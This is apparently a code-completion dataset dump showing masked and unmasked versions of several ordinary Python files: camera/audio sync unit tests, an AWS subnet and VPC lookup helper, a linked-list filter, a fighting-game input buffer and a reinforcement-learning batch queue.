self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
# UNIT DATA
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
# Add drift
ts += np.full_like(ts, 1e-4).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.
audio = {'times': np.empty(n_pulses * 2),
'polarities': gpio['polarities']}
for p in range(n_pulses):
i = p * 2
rise = (pulse_width * p) + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
        self.assertEqual(audio, audio_, 'Audio dict shouldn\'t be affected')
np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05])
# Broken TTLs + extra TTL
delay = 0.08
pulse_width = 1e-5
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
# One front shifted by a large amount
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3])))
def test_attribute_times(self, display=False):
# Create two timestamp arrays at two different frequencies
tsa = np.linspace(0, 60, 60 * 4)[:60] # 240bpm
tsb = np.linspace(0, 60, 60 * 3)[:45] # 180bpm
tsa = np.sort(np.append(tsa, .4)) # Add ambiguous front
tsb = np.sort(np.append(tsb, .41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
# Check with default args
matches = camera.attribute_times(tsa, tsb)
expected = np.array(
[0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21,
22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44,
45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
)
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
# Taking closest instead of first should change index of ambiguous front
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
# Taking first after should exclude many pulses
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20,
22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
# Lower tolerance
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
# Remove injective assert
matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest')
expected = np.array(
[0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22,
24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45,
46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
)
np.testing.assert_array_equal(matches, expected)
# Check input validation
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
if __name__ == "__main__":
unittest.main(exit=False, verbosity=2)
| [
34,
38,
40,
43,
49
] |
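A note on the drift model in TestSyncWheelBpod above: np.polyval(drift_pol, t) with drift_pol = [11e-6, -20] evaluates to 11e-6 * t - 20, i.e. the bpod clock runs 20 s behind with an 11 ppm linear drift, and sync_trials_robust must recover the mapping even with missing events. A minimal check (illustrative, not part of the dataset row):
import numpy as np

drift_pol = np.array([11 * 1e-6, -20])
t0 = np.array([0.0, 100.0, 1000.0])
t1 = np.polyval(drift_pol, t0) + t0
# offset between the two clocks: -20 s plus 11 microseconds per second
print(t1 - t0)  # [-20.0, -19.9989, -19.989]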
65 | 767c0e6d956701fcedddb153b6c47f404dec535a | <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
                self.vpcs[name] = vpc['VpcId']
        self.loaded = 1
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
<mask token>
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
<mask token>
| <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
                self.vpcs[name] = vpc['VpcId']
        self.loaded = 1
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
<mask token>
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
                self.vpcs[name] = vpc['VpcId']
        self.loaded = 1
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| import boto3
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
                self.vpcs[name] = vpc['VpcId']
        self.loaded = 1
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| import boto3
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
# load subnets
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
# load vpcs
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
                self.vpcs[name] = vpc['VpcId']
        self.loaded = 1
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map( lambda x: self.subnets[x] ,
filter(lambda x: x.startswith(f"{environment_name}{subnetname}"), self.subnets)
))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f"{environment_name}-vpc" in vpcs:
return vpcs[f"{environment_name}-vpc"]
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'}))
print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'}))
print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))
| [
5,
8,
9,
10,
11
] |
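The manual NextToken loops in the row above (corrected here to call describe_subnets for pagination and to read the Vpcs key of describe_vpcs responses) can also be written with boto3's built-in paginators. A minimal sketch, assuming the same Name-tag scheme; the function name is illustrative, not the source's implementation:
import boto3

def subnet_ids_by_name():
    client = boto3.client('ec2')
    subnets = {}
    # the paginator handles NextToken internally
    for page in client.get_paginator('describe_subnets').paginate():
        for subnet in page['Subnets']:
            for tag in subnet.get('Tags', []):  # Tags may be absent
                if tag['Key'] == 'Name':
                    subnets[tag['Value']] = subnet['SubnetId']
    return subnets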
66 | efcbe296ea72a94be967124a8ba8c84a524e2eb1 | <mask token>
| <mask token>
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
<mask token>
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
from rec_linked_list import *
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
from rec_linked_list import *
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| [
0,
1,
2,
3,
4
] |
67 | 4789546128263bd298f8f5827734f8402747b9ac | <mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
<mask token>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
<mask token>
def __str__(self):
return f'{self._inputs}'
<mask token>
@property
def values(self) ->list:
return self._inputs.values()
<mask token>
<mask token>
<mask token>
<mask token>
def clear(self):
self._inputs.clear()
<mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
<mask token>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
<mask token>
def get_inputs(self) ->dict:
return self._inputs
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
"""
Responsible for collecting game input from both players. The game state will pull data from here if needed.
Network messages will also update the input buffer when receiving data from the opposite player
"""
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
def add_input(self, input, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input.value)
else:
self._inputs[frame] = [input.value]
def get_inputs(self) ->dict:
return self._inputs
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
def poll_client_inputs(self, frame: int) ->None:
if Input.is_action_pressed(action_name=self.left_action_name):
self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
elif Input.is_action_pressed(action_name=self.right_action_name):
self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
if Input.is_action_pressed(action_name=self.weak_punch_action_name):
self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| from enum import Enum
from roll.input import Input
from roll.network import Server, Client
from assets.game_projects.fighter.src.game_properties import GameProperties
from assets.game_projects.fighter.src.network_message import NetworkMessage
class InputBuffer:
"""
Responsible for collecting game input from both players. The game state will pull data from here if needed.
Network messages will also update the input buffer when receiving data from the opposite player
"""
class Value(Enum):
LEFT = "l"
RIGHT = "r"
UP = "u"
DOWN = "d"
WEAK_PUNCH = "wp"
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f"{self._inputs}"
def __repr__(self):
return f"{self._inputs}"
@property
def values(self) -> list:
return self._inputs.values()
def add_input(self, input, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input.value)
else:
self._inputs[frame] = [input.value]
def get_inputs(self) -> dict:
return self._inputs
def get_frame_inputs(self, frame: int) -> list:
return self._inputs.get(frame, [])
def is_empty(self) -> bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
def poll_client_inputs(self, frame: int) -> None:
if Input.is_action_pressed(action_name=self.left_action_name):
self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
elif Input.is_action_pressed(action_name=self.right_action_name):
self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
if Input.is_action_pressed(action_name=self.weak_punch_action_name):
self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
super().__init__(
left_action_name=left_action_name,
right_action_name=right_action_name,
weak_punch_action_name=weak_punch_action_name,
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) -> None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
else:
Client.send_message_to_server(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(
left_action_name="",
right_action_name="",
weak_punch_action_name="",
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) -> None:
# TODO: Proper prediction
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| [
7,
11,
16,
19,
21
] |
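A hypothetical driver for the InputBuffer above (the action names, the frame loop, and a running roll engine behind Input.is_action_pressed are assumptions, not from the source):
buffer = InputBuffer(left_action_name='p1_left',
                     right_action_name='p1_right',
                     weak_punch_action_name='p1_weak_punch',
                     frame_limit=12)
for frame in range(120):
    # records whichever actions the roll engine reports as pressed this frame
    buffer.poll_client_inputs(frame=frame)
    inputs = buffer.get_frame_inputs(frame=frame)  # e.g. ['l', 'wp']
    # entries older than frame - 12 have been dropped by poll_client_inputs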
68 | b693cc63e2ee4c994ef7b5e44faea99f15a021f6 | <mask token>
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
<mask token>
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
<mask token>
| <mask token>
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
<mask token>
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| <mask token>
